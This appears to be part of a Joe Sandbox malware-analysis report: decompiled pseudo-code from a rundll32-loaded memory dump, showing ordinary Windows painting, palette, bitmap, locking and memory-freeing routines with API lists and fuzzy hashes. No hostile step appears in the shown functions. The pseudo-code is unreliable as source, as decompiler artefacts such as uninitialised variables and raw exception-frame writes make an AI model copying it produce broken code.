                          				_t344 =  *((intOrPtr*)(_t224 + 0x210));
                          				if( *((intOrPtr*)(_t224 + 0x210)) != 0) {
                          					_t230 = E02855D3C(_v8, _t344);
                          					if( *((intOrPtr*)(_t230 + 0x34)) !=  *((intOrPtr*)(E02855D3C(_v8, _t344) + 0x7c))) {
                          						_t321 =  *0x285ded8; // 0x285df24
                          						if(E027D3398( *((intOrPtr*)(_v8 + 0x2ac)), _t321) != 0) {
                          							E0282D0F0( *((intOrPtr*)(_v8 + 0x2ac)),  &_v68);
                          							E0282D268( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2ac)) + 0x30)),  &_v20,  &_v68);
                          							E0282D0F0(_v8,  &_v68);
                          							_t347 = _v56 - _v16;
                          							if(_v56 > _v16) {
                          								__eflags = 0;
                          								_v16 = 0;
                          							} else {
                          								_v16 = _t264->bottom - 1;
                          							}
                          							E027F81B0( *((intOrPtr*)(_v8 + 0x21c)), _v16, _v20 -  *((intOrPtr*)(_v8 + 0x40)) + 1);
                          							E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x21c)) + 0x10)), _v16,  *((intOrPtr*)(E02855D3C(_v8, _t347) + 0x34)), _t333, _t340);
                          							E027F8150( *((intOrPtr*)(_v8 + 0x21c)), _v16, _v20 -  *((intOrPtr*)(_v8 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2ac)) + 0x48)) - 1);
                          						}
                          					}
                          				}
                          				_pop(_t319);
                          				 *[fs:eax] = _t319;
                          				_push(0x285fd26);
                          				return E027F856C( *((intOrPtr*)(_v8 + 0x21c)), _v12);
                          			}





















                          APIs
                          • GetClientRect.USER32(00000000,?), ref: 0285F9F5
                          • GetWindowRect.USER32(00000000,?), ref: 0285FA04
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0285FA17
                          • OffsetRect.USER32(?,?,?), ref: 0285FA2B
                          • ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,?), ref: 0285FA41
                          • OffsetRect.USER32(?,?,?), ref: 0285FA52
                            • Part of subcall function 027F81B0: MoveToEx.GDI32(00000000,?,?,00000000), ref: 027F81CE
                            • Part of subcall function 027F8150: LineTo.GDI32(?), ref: 027F8173
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$OffsetWindow$ClientClipExcludeLineMovePoints
                          • String ID:
                          • API String ID: 3767273771-0
                          • Opcode ID: 520f17e9fe583ee0865ab589caf88aa5e0cc6706ba919c0edabe1616536101c5
                          • Instruction ID: f3f70b26ef304d23a6391d95d17c0d13cca12ef3e64a3667e9e62b63bdcc4093
                          • Opcode Fuzzy Hash: 520f17e9fe583ee0865ab589caf88aa5e0cc6706ba919c0edabe1616536101c5
                          • Instruction Fuzzy Hash: 92B16F78644118DFCB45EF98C988DAEB7F6EF58300B2585E4E909AB365CB30EE019F51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E028169E4(intOrPtr* __eax, intOrPtr* __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr* _v12;
                          				struct HDC__* _v16;
                          				struct tagPAINTSTRUCT _v80;
                          				struct tagRECT _v96;
                          				struct tagRECT _v112;
                          				signed int _v116;
                          				long _v120;
                          				void* __ebp;
                          				void* _t68;
                          				void* _t94;
                          				struct HBRUSH__* _t97;
                          				intOrPtr _t105;
                          				void* _t118;
                          				void* _t127;
                          				intOrPtr _t140;
                          				intOrPtr _t146;
                          				void* _t147;
                          				void* _t148;
                          				void* _t150;
                          				void* _t152;
                          				intOrPtr _t153;
                          
                          				_t138 = __edx;
                          				_t150 = _t152;
                          				_t153 = _t152 + 0xffffff8c;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t68 =  *_v12 - 0xf;
                          				if(_t68 == 0) {
                          					_v16 =  *(_v12 + 4);
                          					if(_v16 == 0) {
                          						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					_push(_t150);
                          					_push(0x2816bb2);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t153;
                          					if(_v16 == 0) {
                          						GetWindowRect( *(_v8 + 0x254),  &_v96);
                          						E0282D294(_v8,  &_v120,  &_v96);
                          						_v96.left = _v120;
                          						_v96.top = _v116;
                          						E0282C064( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
                          					}
                          					E02831C30(_v8, _t127, _v12, _t147, _t148);
                          					_pop(_t140);
                          					 *[fs:eax] = _t140;
                          					_push(0x2816bc0);
                          					if(_v16 == 0) {
                          						return EndPaint( *(_v8 + 0x254),  &_v80);
                          					}
                          					return 0;
                          				} else {
                          					_t94 = _t68 - 5;
                          					if(_t94 == 0) {
                          						_t97 = E027F7CD8( *((intOrPtr*)(_v8 + 0x170)));
                          						 *((intOrPtr*)( *_v8 + 0x44))();
                          						FillRect( *(_v12 + 4),  &_v112, _t97);
                          						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
                          							GetClientRect( *(_v8 + 0x254),  &_v96);
                          							FillRect( *(_v12 + 4),  &_v96, E027F7CD8( *((intOrPtr*)(_v8 + 0x170))));
                          						}
                          						_t105 = _v12;
                          						 *((intOrPtr*)(_t105 + 0xc)) = 1;
                          					} else {
                          						_t118 = _t94 - 0x2b;
                          						if(_t118 == 0) {
                          							E02816944(_t150);
                          							_t105 = _v8;
                          							if( *((char*)(_t105 + 0x22f)) == 2) {
                          								if(E02816F74(_v8) == 0 || E02816990(_t138, _t150) == 0) {
                          									_t146 = 1;
                          								} else {
                          									_t146 = 0;
                          								}
                          								_t105 = E02813204( *(_v8 + 0x254), _t146);
                          							}
                          						} else {
                          							if(_t118 != 0x45) {
                          								_t105 = E02816944(_t150);
                          							} else {
                          								E02816944(_t150);
                          								_t105 = _v12;
                          								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
                          									_t105 = _v12;
                          									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
                          								}
                          							}
                          						}
                          					}
                          					return _t105;
                          				}
                          			}


























                          APIs
                          • FillRect.USER32(?,?), ref: 02816A5D
                          • GetClientRect.USER32(00000000,?), ref: 02816A88
                          • FillRect.USER32(?,?,00000000), ref: 02816AA7
                            • Part of subcall function 02816944: CallWindowProcA.USER32(?,?,?,?,?), ref: 0281697E
                          • BeginPaint.USER32(?,?), ref: 02816B1F
                          • GetWindowRect.USER32(?,?), ref: 02816B4C
                          • EndPaint.USER32(?,?,02816BC0), ref: 02816BAC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$FillPaintWindow$BeginCallClientProc
                          • String ID:
                          • API String ID: 901200654-0
                          • Opcode ID: 1f09c2a9749228c384bb845e741b920c617f35a5260c7671aeac8616c3cf7e33
                          • Instruction ID: cbdfc02ea583026955f18694821ecb818a478bd8dd27baa45dcf7013800847e6
                          • Opcode Fuzzy Hash: 1f09c2a9749228c384bb845e741b920c617f35a5260c7671aeac8616c3cf7e33
                          • Instruction Fuzzy Hash: AD51E979A00118EFCB00DFA8C988E9DB7FDAF49314F1585A5E448EB291E735AA85CF14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E027F36B4(void* __eax, void* __ebx, void* __edi, void* __esi) {
                          				char _v5;
                          				intOrPtr* _v12;
                          				long _v16;
                          				char _v20;
                          				char _v24;
                          				long _t22;
                          				char _t29;
                          				void* _t53;
                          				intOrPtr _t61;
                          				intOrPtr* _t62;
                          				intOrPtr _t63;
                          				intOrPtr _t66;
                          				intOrPtr _t67;
                          				void* _t72;
                          				void* _t73;
                          				intOrPtr _t74;
                          
                          				_t72 = _t73;
                          				_t74 = _t73 + 0xffffffec;
                          				_push(__esi);
                          				_push(__edi);
                          				_t53 = __eax;
                          				_t22 = GetCurrentThreadId();
                          				_t62 =  *0x2864794; // 0x2865034
                          				if(_t22 !=  *_t62) {
                          					_v24 = GetCurrentThreadId();
                          					_v20 = 0;
                          					_t61 =  *0x28645d0; // 0x27e6730
                          					E027DBCBC(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
                          					E027D3A9C();
                          				}
                          				if(_t53 <= 0) {
                          					E027F368C();
                          				} else {
                          					E027F3698(_t53);
                          				}
                          				_v16 = 0;
                          				_push(0x2865870);
                          				L027D656C();
                          				_push(_t72);
                          				_push(0x27f3842);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				_v16 = InterlockedExchange(0x28635b8, _v16);
                          				_push(_t72);
                          				_push(0x27f3823);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t74;
                          				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
                          					_t29 = 0;
                          				} else {
                          					_t29 = 1;
                          				}
                          				_v5 = _t29;
                          				if(_v5 == 0) {
                          					L14:
                          					_pop(_t63);
                          					 *[fs:eax] = _t63;
                          					_push(0x27f382a);
                          					return E027D320C(_v16);
                          				} else {
                          					if( *((intOrPtr*)(_v16 + 8)) > 0) {
                          						_v12 = E027EB1E0(_v16, 0);
                          						E027EB0D0(_v16, 0);
                          						L027D66B4();
                          						 *[fs:eax] = _t74;
                          						 *[fs:eax] = _t74;
                          						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x27f37ed, _t72, 0x2865870);
                          						_pop(_t66);
                          						 *[fs:eax] = _t66;
                          						_t67 = 0x27f37be;
                          						 *[fs:eax] = _t67;
                          						_push(0x27f37f4);
                          						_push(0x2865870);
                          						L027D656C();
                          						return 0;
                          					} else {
                          						goto L14;
                          					}
                          				}
                          			}




















                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 027F36BF
                          • GetCurrentThreadId.KERNEL32 ref: 027F36CE
                            • Part of subcall function 027F368C: ResetEvent.KERNEL32(000002B0,027F3709), ref: 027F3692
                          • RtlEnterCriticalSection.KERNEL32(02865870), ref: 027F3713
                          • InterlockedExchange.KERNEL32(028635B8,?), ref: 027F372F
                          • RtlLeaveCriticalSection.KERNEL32(02865870,00000000,027F3823,?,00000000,027F3842,?,02865870), ref: 027F3788
                          • RtlEnterCriticalSection.KERNEL32(02865870,027F37F4,027F3823,?,00000000,027F3842,?,02865870), ref: 027F37E7
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                          • String ID:
                          • API String ID: 2189153385-0
                          • Opcode ID: 2806618d3b2dd6c12eab61141e8dc7d90f17fa8830e6908a35eb2327750ee560
                          • Instruction ID: 33cccc330184a2a33a8bae1fb7c0a6a6d4a09fe98129cc37cbf169891501e591
                          • Opcode Fuzzy Hash: 2806618d3b2dd6c12eab61141e8dc7d90f17fa8830e6908a35eb2327750ee560
                          • Instruction Fuzzy Hash: 2231D3B4A08385AFE752DFA4D899A6EBBF9EB09B00F4184E4E601D6750D7399800CE31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02857610(void* __eax, void* __ecx, void* __edi, void* __eflags) {
                          				void* _t26;
                          				void* _t31;
                          				int _t37;
                          				int _t40;
                          				void* _t44;
                          				void* _t49;
                          				int _t56;
                          				void* _t60;
                          				void* _t65;
                          
                          				_t60 = __eax;
                          				E027F7DC0( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x160)) + 0x14)), __ecx, 0, __edi, _t65, __eflags);
                          				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x160)) + 0x10)), __ecx,  *((intOrPtr*)(E02855D3C(E028578B8(_t60), __eflags) + 0x70)), __edi, _t65);
                          				_t26 =  *((intOrPtr*)(E028578B8(_t60) + 0x227)) - 2;
                          				if(_t26 >= 0) {
                          					_t44 = _t26 - 2;
                          					if(_t44 < 0) {
                          						PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 2, 6, 0x5a0049);
                          						_t49 = E0282D154(_t60);
                          						PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, _t49 - 6, 2, 0x5a0049);
                          						_t56 = E0282D154(_t60) - 4;
                          						__eflags = _t56;
                          						return PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), _t56, 0, 2, 6, 0x5a0049);
                          					}
                          					return _t44;
                          				}
                          				PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 6, 2, 0x5a0049);
                          				_t31 = E0282D198(_t60);
                          				PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, 2, _t31 - 4, 0x5a0049);
                          				_t37 = E0282D198(_t60);
                          				_t40 = E0282D198(_t60) - 2;
                          				__eflags = _t40;
                          				return PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, _t40, 6, _t37, 0x5a0049);
                          			}













                          APIs
                          • PatBlt.GDI32(00000000,00000000,00000000,00000006,00000002,005A0049), ref: 02857673
                          • PatBlt.GDI32(00000000,00000002,00000002,00000002,-00000004,005A0049), ref: 0285769A
                          • PatBlt.GDI32(00000000,00000000,-00000002,00000006,00000000,005A0049), ref: 028576C7
                          • PatBlt.GDI32(00000000,00000000,00000000,00000002,00000006,005A0049), ref: 028576E7
                          • PatBlt.GDI32(00000000,00000002,00000002,-00000006,00000002,005A0049), ref: 0285770E
                          • PatBlt.GDI32(00000000,-00000004,00000000,00000002,00000006,005A0049), ref: 02857735
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ca578b8701be7ae8a406fe4c9541cdd9eca0d2c7df7a84c53836d1538809b1e
                          • Instruction ID: d6de68f6709b1634109321d0a2df47e4f68bfec8036f7d8c6dd340b4759ff7aa
                          • Opcode Fuzzy Hash: 3ca578b8701be7ae8a406fe4c9541cdd9eca0d2c7df7a84c53836d1538809b1e
                          • Instruction Fuzzy Hash: 8F2110683903107BE661BF788C8FF6B6A5A7B04704F449471BB09EF2D7C9AAD8044E65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E027F9324(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				signed int _v32;
                          				struct HDC__* _v44;
                          				signed int* _t36;
                          				signed int _t39;
                          				signed int _t42;
                          				signed int* _t52;
                          				signed int _t56;
                          				intOrPtr _t66;
                          				void* _t72;
                          				void* _t73;
                          				void* _t74;
                          				intOrPtr _t75;
                          
                          				_t73 = _t74;
                          				_t75 = _t74 + 0xffffff90;
                          				_v16 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t52 = _a8;
                          				_v24 = _v16 << 4;
                          				_v20 = E027D8138(_v24, __eflags);
                          				 *[fs:edx] = _t75;
                          				_t56 = _v24;
                          				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x27f961b, _t73, __edi, __esi, __ebx, _t72);
                          				if(( *_t52 | _t52[1]) != 0) {
                          					_t36 = _a4;
                          					 *_t36 =  *_t52;
                          					_t36[1] = _t52[1];
                          				} else {
                          					 *_a4 = GetSystemMetrics(0xb);
                          					_a4[1] = GetSystemMetrics(0xc);
                          				}
                          				_v44 = GetDC(0);
                          				if(_v44 == 0) {
                          					E027F87E8(_t56);
                          				}
                          				_push(_t73);
                          				_push(0x27f940d);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t75;
                          				_t39 = GetDeviceCaps(_v44, 0xe);
                          				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
                          				if(_t42 <= 8) {
                          					__eflags = 1;
                          					_v32 = 1 << _t42;
                          				} else {
                          					_v32 = 0x7fffffff;
                          				}
                          				_pop(_t66);
                          				 *[fs:eax] = _t66;
                          				_push(0x27f9414);
                          				return ReleaseDC(0, _v44);
                          			}





















                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 027F9372
                          • GetSystemMetrics.USER32(0000000C), ref: 027F937E
                          • GetDC.USER32(00000000), ref: 027F939A
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 027F93C1
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 027F93CE
                          • ReleaseDC.USER32(00000000,00000000), ref: 027F9407
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDeviceMetricsSystem$Release
                          • String ID:
                          • API String ID: 447804332-0
                          • Opcode ID: 8e57a93e1ff8bdfe5fb1151673c30ddee03ba1cd5e4c410adafd0c08f4cfa952
                          • Instruction ID: a42800a466d628ab70a6caeb74ac35ed0ea79c978c6c51a7fb057a7db56201cf
                          • Opcode Fuzzy Hash: 8e57a93e1ff8bdfe5fb1151673c30ddee03ba1cd5e4c410adafd0c08f4cfa952
                          • Instruction Fuzzy Hash: 08316174A04204EFEB41DFA5C885BAEBBB6FF89710F108565EA14AB384C731A941CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E027F9794(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                          				char _v5;
                          				struct HPALETTE__* _v12;
                          				struct HDC__* _v16;
                          				struct tagBITMAPINFO* _t36;
                          				intOrPtr _t43;
                          				struct HBITMAP__* _t47;
                          				void* _t50;
                          
                          				_t36 = __ecx;
                          				_t47 = __eax;
                          				E027F9644(__eax, _a4, __ecx);
                          				_v12 = 0;
                          				_v16 = CreateCompatibleDC(0);
                          				_push(_t50);
                          				_push(0x27f9831);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t50 + 0xfffffff4;
                          				if(__edx != 0) {
                          					_v12 = SelectPalette(_v16, __edx, 0);
                          					RealizePalette(_v16);
                          				}
                          				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                          				_pop(_t43);
                          				 *[fs:eax] = _t43;
                          				_push(0x27f9838);
                          				if(_v12 != 0) {
                          					SelectPalette(_v16, _v12, 0);
                          				}
                          				return DeleteDC(_v16);
                          			}











                          APIs
                            • Part of subcall function 027F9644: GetObjectA.GDI32(?,00000054), ref: 027F9658
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F97B6
                          • SelectPalette.GDI32(?,?,00000000), ref: 027F97D7
                          • RealizePalette.GDI32(?), ref: 027F97E3
                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 027F97FA
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027F9822
                          • DeleteDC.GDI32(?), ref: 027F982B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                          • String ID:
                          • API String ID: 1221726059-0
                          • Opcode ID: 5e717d557351002e7b6d3f00df1653cf563c4008a95968afa0233354a2e78120
                          • Instruction ID: f3510c0d0ab29a351b1ae5cfdb5c5ee5ca4769214b7791424e2da7520e9ce77d
                          • Opcode Fuzzy Hash: 5e717d557351002e7b6d3f00df1653cf563c4008a95968afa0233354a2e78120
                          • Instruction Fuzzy Hash: 24115E75A04208BFEB55DBA9DC85F9EBBFDEF48B10F518464B618E7280D6749900CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E027D1B80() {
                          				void* _t2;
                          				void* _t3;
                          				void* _t14;
                          				intOrPtr* _t19;
                          				intOrPtr _t23;
                          				intOrPtr _t26;
                          				intOrPtr _t28;
                          
                          				_t26 = _t28;
                          				if( *0x28655c4 == 0) {
                          					return _t2;
                          				} else {
                          					_push(_t26);
                          					_push(E027D1C56);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t28;
                          					if( *0x286504d != 0) {
                          						_push(0x28655cc);
                          						L027D1418();
                          					}
                          					 *0x28655c4 = 0;
                          					_t3 =  *0x2865624; // 0x2916550
                          					LocalFree(_t3);
                          					 *0x2865624 = 0;
                          					_t19 =  *0x28655ec; // 0x2917b84
                          					while(_t19 != 0x28655ec) {
                          						_t1 = _t19 + 8; // 0x41d0000
                          						VirtualFree( *_t1, 0, 0x8000);
                          						_t19 =  *_t19;
                          					}
                          					E027D1480(0x28655ec);
                          					E027D1480(0x28655fc);
                          					E027D1480(0x2865628);
                          					_t14 =  *0x28655e4; // 0x2917550
                          					while(_t14 != 0) {
                          						 *0x28655e4 =  *_t14;
                          						LocalFree(_t14);
                          						_t14 =  *0x28655e4; // 0x2917550
                          					}
                          					_pop(_t23);
                          					 *[fs:eax] = _t23;
                          					_push(0x27d1c5d);
                          					if( *0x286504d != 0) {
                          						_push(0x28655cc);
                          						L027D1420();
                          					}
                          					_push(0x28655cc);
                          					L027D1428();
                          					return 0;
                          				}
                          			}











                          APIs
                          • RtlEnterCriticalSection.KERNEL32(028655CC,00000000,027D1C56), ref: 027D1BAD
                          • LocalFree.KERNEL32(02916550,00000000,027D1C56), ref: 027D1BBF
                          • VirtualFree.KERNEL32(041D0000,00000000,00008000,02916550,00000000,027D1C56), ref: 027D1BDE
                          • LocalFree.KERNEL32(02917550,041D0000,00000000,00008000,02916550,00000000,027D1C56), ref: 027D1C1D
                          • RtlLeaveCriticalSection.KERNEL32(028655CC,027D1C5D,02916550,00000000,027D1C56), ref: 027D1C46
                          • RtlDeleteCriticalSection.KERNEL32(028655CC,027D1C5D,02916550,00000000,027D1C56), ref: 027D1C50
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                          • String ID:
                          • API String ID: 3782394904-0
                          • Opcode ID: 0d26644e812c85404f1bae3c05c1f31f6141cb21779964a5788941bebdd90198
                          • Instruction ID: 861aaeb2f0e48b452781e3548e1fc62523097e23e49abfec4a057ba62500f953
                          • Opcode Fuzzy Hash: 0d26644e812c85404f1bae3c05c1f31f6141cb21779964a5788941bebdd90198
                          • Instruction Fuzzy Hash: 3C1191BCB853409FF716AB68A95DB2A3BBAE745744FC04894E10C8B6C1D7ACA450CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0282A4C4(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				char _v8;
                          				void* _t20;
                          				void* _t21;
                          				void* _t27;
                          				void* _t31;
                          				void* _t35;
                          				intOrPtr* _t43;
                          
                          				_t43 =  &_v8;
                          				_t20 =  *0x2863ebc; // 0x0
                          				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                          				_t21 =  *0x2863ebc; // 0x0
                          				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                          				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                          					SetWindowLongA(_a4, 0xfffffff4, _a4);
                          				}
                          				_t27 =  *0x2863ebc; // 0x0
                          				SetPropA(_a4,  *0x2865ba2 & 0x0000ffff, _t27);
                          				_t31 =  *0x2863ebc; // 0x0
                          				SetPropA(_a4,  *0x2865ba0 & 0x0000ffff, _t31);
                          				_t35 =  *0x2863ebc; // 0x0
                          				 *0x2863ebc = 0;
                          				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                          				return  *_t43;
                          			}











                          APIs
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0282A4EC
                          • GetWindowLongA.USER32(?,000000F0), ref: 0282A4F7
                          • GetWindowLongA.USER32(?,000000F4), ref: 0282A509
                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0282A51C
                          • SetPropA.USER32(?,00000000,00000000), ref: 0282A533
                          • SetPropA.USER32(?,00000000,00000000), ref: 0282A54A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LongWindow$Prop
                          • String ID:
                          • API String ID: 3887896539-0
                          • Opcode ID: 2c4e8f4be5966f36105d6e24346da15550e5284eddb21fa06b1028077ca27df9
                          • Instruction ID: 73670e56547a39aff962948f8bc53bb01143af6203e8367a2a9ebba69dcafe50
                          • Opcode Fuzzy Hash: 2c4e8f4be5966f36105d6e24346da15550e5284eddb21fa06b1028077ca27df9
                          • Instruction Fuzzy Hash: EB11F9B9A04108BFCF01DFD8E988E9A37AEFB08350F108645F918CB290D774E954CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027F8FD4(void* __eax, signed int __ecx) {
                          				char _v1036;
                          				signed int _v1038;
                          				struct tagRGBQUAD _v1048;
                          				short _v1066;
                          				void* _t20;
                          				struct HDC__* _t25;
                          				void* _t28;
                          				void* _t31;
                          				struct HPALETTE__* _t33;
                          				LOGPALETTE* _t34;
                          
                          				_t31 = __eax;
                          				_t33 = 0;
                          				_t34->palVersion = 0x300;
                          				if(__eax == 0) {
                          					_v1038 = __ecx;
                          					E027D2978(_t28, __ecx << 2,  &_v1036);
                          				} else {
                          					_t25 = CreateCompatibleDC(0);
                          					_t20 = SelectObject(_t25, _t31);
                          					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
                          					SelectObject(_t25, _t20);
                          					DeleteDC(_t25);
                          				}
                          				if(_v1038 != 0) {
                          					if(_v1038 != 0x10 || E027F8F3C(_t34) == 0) {
                          						E027F8DCC( &_v1036, _v1038 & 0x0000ffff);
                          					}
                          					_t33 = CreatePalette(_t34);
                          				}
                          				return _t33;
                          			}














                          APIs
